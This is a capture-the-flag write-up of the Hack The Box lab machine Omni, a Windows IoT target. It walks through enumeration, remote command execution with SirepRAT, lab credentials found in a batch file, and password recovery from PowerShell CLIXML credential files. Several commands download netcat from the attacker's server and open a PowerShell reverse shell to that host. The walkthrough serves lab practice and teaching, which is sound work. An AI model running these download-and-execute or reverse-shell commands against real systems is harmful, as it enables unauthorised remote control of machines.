HTB Omni

2021-01-09

Omni is an Easy machine from HTB. The info card features a question mark in place of the OS, so it's something a little bit different than normal. I would sharpen your PowerShell skills though.

Enumeration

We start off with an Nmap scan and see a whole bunch of open ports on what seems to be a Windows machine.

Nmap scan report for 10.10.10.204
Host is up (0.081s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

We start looking at the ports. RPC looks interesting and we try to get a connection going with rpcclient, but we are unsuccessful. Then we google around trying to find something for ARCserve. No luck again. We check out port 8080 and are greeted by a login prompt.

Unfortunately, we have no credentials. At this point, we turn back to google. We search for “Windows Device Manager” and find some references to Windows IoT, a lightweight version of Windows 10 intended to be used in embedded devices. We now know more about what we are looking at.

Foothold

We do some more googling here and quickly find a rather interesting GitHub repository.

https://github.com/SafeBreach-Labs/SirepRAT

It includes an awesome white paper and a set of slides.

I won’t go into all the details. However, the basic idea is that if you are connected to a Windows IoT system via Ethernet, you can run commands as SYSTEM. This is possibly due to Windows IoT having some relation to the Windows mobile OS and its debugging shell, which would have been connected to over USB.

Now we aren’t actually connected via Ethernet, but from the perspective of Omni we might as well be.

We clone the repository and start getting it set up. This is a bit tricky because it was written in Python 2 and is also dependency hell.

Eventually, we get the required libraries installed, including enum34, and are able to get set up. We start a Python HTTP server in a directory containing a Windows netcat binary, sudo python -m http.server 80, and a netcat listener with rlwrap to catch our reverse shell, rlwrap nc -lnvp 4436.

We use SirepRAT to launch a command, providing the path to PowerShell and using Invoke-WebRequest to retrieve netcat from our Python server and save it. We then launch cmd.exe, run our netcat file and pass it the arguments to open a reverse shell with PowerShell to our machine.

python2 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe" --args "/c Invoke-WebRequest -OutFile C:\Windows\System32\nc78.exe -URI http://10.10.15.40/nc64.exe" --vv && python2 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\windows\system32\cmd.exe" --args "/c C:\windows\system32\nc78.exe 10.10.15.40 4436 -e C:\windows\system32\WindowsPowershell\v1.0\powershell.exe" --vv

And we have a shell at last.

Enumeration on the box

Now that we are on the box, it is time to find the flags and figure out how to get them. There is no C:\Users, so we run a quick search with PowerShell to find any .txt files.

PS C:\Users\Public> Get-Childitem -Path C:\ -Include *.txt -File -Recurse -ErrorAction SilentlyContinue

...

    Directory: C:\Data\Users\administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         7/4/2020   9:48 PM           1958 root.txt

...

    Directory: C:\Data\Users\app


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         7/4/2020   8:20 PM            344 hardening.txt
-ar---         7/4/2020   9:53 PM           1958 user.txt

We find user.txt and root.txt in C:\Data\Users\app and C:\Data\Users\administrator respectively.

Running $env:username shows us that we are the user omni, not app, but we decide to head over and see if we can snag the flag. Typing it out, we find a slight issue.

We check through app data, the path variable, and iot-admin.xml, but we can’t seem to find anything to leverage. I went a bit crazy at this point after checking the forums, because there were multiple references to checking the “path”. However, I was unable to find anything unusual there.

I honestly got stuck here for quite a while. Eventually, I got a nudge to check for hidden batch files, which we did with the following command.

PS C:\> Get-ChildItem -Recurse -Filter *.bat -Force

Most of the results from this are things we don’t have access to, but there are a few we do. One looks rather suspicious: C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat

Side note: From my conversations with a few others, their shells started in C:\Program Files\WindowsPowerShell\Modules\PackageManagement, which probably explains the path reference. I’m not sure why mine wasn’t there.

We type that file and are greeted by a beautiful sight: credentials.

PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> type r.bat
type r.bat
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT

User

We are ready to go for User at last. We head back to port 8080 and log in as the user app.

Under the Processes tab, there is an option to “Run Command” that catches our eye right away. We select that and sure enough we have a form to fill in to run commands. We kill our current reverse shell, restart our listener and then enter the following command.

C:\windows\system32\nc79.exe 10.10.15.40 4436 -e C:\windows\system32\WindowsPowershell\v1.0\powershell.exe

A moment later, we get a notice that the command has failed… But if we go back over to our listener, we can see that we do in fact have a shell.

It seems the reports of failure were greatly exaggerated.

We head back to app’s home directory, C:\Data\Users\app, and get to work on the file. Despite the .txt extension, you might have noticed user.txt looks more like an XML file.

Import-CliXML is the PowerShell cmdlet that imports an XML file and creates a PowerShell object. We run it with user.txt as the path and it tells us System.Security.SecureString. After some research, we learn it is a saved credential object and can be used to return a password.

$user123 = Import-CliXML -Path .\user.txt
$user123.GetNetworkCredential().Password
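To see why the flag files only give up their password to the account that wrote them, here is an added PowerShell example (not from the original write-up) that round-trips a constructed credential through Export-Clixml and Import-Clixml. The SecureString inside the CLIXML is protected with DPAPI, keyed to the current user and machine, which is why the write-up needs a shell as app for user.txt and as administrator for root.txt.

```powershell
# Added example, not part of the original post. Demonstrates how a PSCredential
# saved with Export-Clixml (the format of user.txt/root.txt on the box) behaves.
$plain  = 'example-secret'   # constructed sample value, not the real flag
$secure = ConvertTo-SecureString $plain -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential -ArgumentList 'app', $secure

# Serialize the credential the same way the flag files were produced.
$path = Join-Path $env:TEMP 'cred-demo.txt'
$cred | Export-Clixml -Path $path

# On disk the password is a DPAPI-encrypted hex blob inside an <SS> element,
# not plaintext, so reading the file as text is not enough.
Select-String -Path $path -Pattern '<SS N="Password">' | Select-Object -ExpandProperty Line

# Same user on the same machine: the import rebuilds the PSCredential and
# DPAPI transparently decrypts the SecureString.
$imported = Import-Clixml -Path $path
$imported.GetType().FullName            # System.Management.Automation.PSCredential
$imported.Password.GetType().FullName   # System.Security.SecureString
$imported.GetNetworkCredential().Password -eq $plain   # True

# Importing the same file as a different user fails with a DPAPI error
# (typically "Key not valid for use in specified state."), which is the
# protection that forces the per-user shells in this write-up.
Remove-Item $path
```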

Submit our flag and we got user!

Root

Root is nearly identical, as you might have guessed. We follow the same steps to log in and get a reverse shell running, and then retrieve the administrator password from root.txt.

PS C:\Data\Users\administrator> $root123 = Import-CliXML -Path .\root.txt
$root123 = Import-CliXML -Path .\root.txt
PS C:\Data\Users\administrator> $root123.GetNetworkCredential().Password
$root123.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
PS C:\Data\Users\administrator>

Wrap Up

Some people felt that what came after that was a bit CTF-ish, and I’m definitely confused how we were supposed to figure out r.bat when we don’t necessarily land in that directory. I really enjoyed this box however, and it was an excellent opportunity to learn some new PowerShell tricks. Thank you egre55 for creating it!
